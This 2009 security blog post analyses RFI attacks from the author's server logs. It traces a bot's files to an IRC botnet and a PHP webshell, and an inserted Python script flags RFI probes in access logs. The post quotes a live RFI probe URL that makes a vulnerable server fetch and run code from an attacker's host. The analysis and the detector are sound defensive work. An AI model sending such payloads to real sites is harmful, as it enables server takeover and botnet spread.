
Bots Galore!!!! Owning the Internets

Feb 04, 2009 in Security


RFI attacks are nothing new.  I discussed this back in 08 [http://www.securepla.net/?p=11].  Pretty much the idea is that a malicious user runs their own PHP code on a vulnerable website.  Why discuss this again?  Well, I saw these attacks constantly in my logs and it got me interested:

xxx.xxx.xxx.xxx - - [29/Jan/2009:09:45:36 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.crosszero.org/zero/iddd.txt???? HTTP/1.1" 404 290 "" "libwww-perl/5.79"

How an RFI works: the include() call in the vulnerable script (here appserv/main.php) instructs the server to retrieve iddd.txt from the remote server and run that code locally.  This is possible because PHP allows the same functions to load both remote and local content.  On a vulnerable system, the code does not perform any checks on the content of the $appserv_root variable and blindly passes it to the function.  Because the original piece of code appended .php to the file name, it would try to fetch the following URL.
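Requests like the one above can be triaged straight out of the access log. The following Python is an added example, not code from the original post: it parses Apache combined-format lines and flags the RFI indicators discussed here (a full URL in a query parameter, the trailing `?` padding that absorbs the script's appended `.php`, and the libwww-perl user agent). The sample log lines are constructed; the first mirrors the request above, and the IP addresses are documentation ranges.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format: ip ident user [ts] "METHOD PATH PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")  # schemes PHP's URL wrappers will fetch for include()

def rfi_indicators(line):
    """Return a list of (indicator, detail) pairs for one log line, [] if clean, None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    findings = []
    for name, value in parse_qsl(urlsplit(m.group("path")).query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            findings.append(("remote_url_in_param", f"{name}={value}"))
            # Trailing '?' padding: whatever the script appends (".php" here) lands in the
            # remote query string, so the remote server still returns iddd.txt unchanged.
            if value.endswith("?"):
                findings.append(("suffix_bypass_padding", name))
    ua = m.group("ua")
    if ua.lower().startswith("libwww-perl"):  # the client string the scanner in the post used
        findings.append(("scanner_user_agent", ua))
    return findings

def triage(log_text):
    """Map 1-based line numbers of suspicious entries to their findings; clean and unparsable lines are omitted."""
    return {n: f for n, f in ((n, rfi_indicators(l)) for n, l in enumerate(log_text.splitlines(), 1)) if f}

# Constructed sample: line 1 mirrors the probe from the post, line 2 is a second probe, line 3 an ordinary visit.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Jan/2009:09:45:36 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.crosszero.org/zero/iddd.txt???? HTTP/1.1" 404 290 "" "libwww-perl/5.79"
203.0.113.7 - - [29/Jan/2009:09:45:37 -0500] "GET /index.php?page=http://www.crosszero.org/zero/iddd.txt? HTTP/1.1" 200 512 "" "libwww-perl/5.79"
198.51.100.4 - - [29/Jan/2009:10:02:11 -0500] "GET /index.php?page=about HTTP/1.1" 200 3210 "http://www.securepla.net/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for n, findings in triage(SAMPLE_LOG).items():
        print(f"line {n}:", findings)
```

A 404 on the probe, as in the line above, only means that path did not exist on this host; the same parameter hitting a script that does include() it is the case worth alerting on.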

Luckily, I wasn't vulnerable to this type of attack, but it got me interested in what exactly was going on here.  So the first thing I did was separately pull the iddd.txt file that was called in the original request.

Here is http://www.crosszero.org/zero/iddd.txt:


*Notice: I included only images as I don’t want other script kiddies using my site to pull the files down. 

Looking through iddd.txt, it is a pretty simple PHP file that returns system information about the vulnerable system: username, OS, free space, total space and used space.

This pretty much lets the malicious hacker know that the RFI attack succeeded and returns a bit of information on the system that was attacked.

This got me interested in what happens after a successful RFI is found.  I scanned http://www.crosszero.org/zero/ (which has now been taken down) and found a multitude of different files that "crosszero" used.  What initially interested me was a file called load2.txt.  In load2.txt, the following was included:


Scanning through load2.txt, we see that he tries to make the server download his boo.txt file, execute it with perl, and lastly clear his tracks.  He tries every which way to download the file, aka curl, wget, etc.  Now we are getting somewhere.  To dive further into this we need to take a look at what is in the boo.txt perl file.

http://www.crosszero.org/zero/boo.txt file:


Ah, looks like this was well commented and we can use it for Educational Purposes!!! yay!  So, what can this perl script do:

##  Features:                                                                      ##
##    [+]Sql Injection Scanner (Fixed a bug which release v5 was affected)         ##
##    [+]Remote File Inclusion Scanner                                             ##
##    [+]Local File Inclusion Scanner                                              ##
##    [+]Remote Code Execution Scanner                                             ##
##    [+]Mass Scan, Google,AlltheWeb,Yahoo, Msn domains:                           ##
##      .at/.com.au/.com.br/.ca/.ch/.cn/.de/.dk/.es/.fr/.it/.co.jp/.com.mx/.co.uk  ##
##    [+]Integrated Shell, so you can execute commands on the server               ##
##    [+]Security Mode to protect “dangerous” functions                            ##
##    [+]Spread Mode, to activate or disable Spread Function                       ##
##    [+]Single Spread Mode, to spread on RFI vulnerable sites                     ##
##    [+]Bypass Engines ON: Google, Yahoo                                          ##
##    !: To “bypass” these engines, the Scanner just looks for websites on other   ##
##    engines that use the same bots than the main ones

A pretty comprehensive list of tasks that a hacker could use.  Parsing through the file, we can see that it forces the vulnerable server to connect to an IRC chatroom on the server irc.XXXXXXXXX.org [changed for research purposes], then join the channel #-, using a predefined nickname from a list later in the script.  After it has successfully joined the IRC channel, the server is now part of this bot network.

So let’s recap:

1) Find websites with RFI
2) Force the vulnerable server to download the perl script through RFI
3) Run the script on the vulnerable machine, which causes that server to connect back to an IRC chat room and wait for its next commands.
4) Send the bots commands and watch your bot network scan and attack the internet.

Let us take a look at what happens in the IRC bot room:


As we can see here, someone has triggered the bots to start scanning for bugs with /?prefix= using some type of dork (or search string) in many of the common search engines.  A successful attack will look like this:


If you look at the text in white, you see the information about the server that I talked about before (the iddd.txt output).  This tells us that the server is vulnerable to RFI and the cycle continues: the compromised server downloads the malicious code, runs it, joins the bot network and waits again.

Extra:

So really how bad is this? “Attackers commonly include a malicious PHP script called a webshell, also known as a PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Potentially, the attacker could even use the webshell to gain administrator-level, or root access on the server.” -Wikipedia

Here is a sample picture of a PHP webshell called r57.txt that was included into a vulnerable RFI webpage:


Here we see that we have shell on the box with the privileges of the Apache service. 🙂

-Cheetz
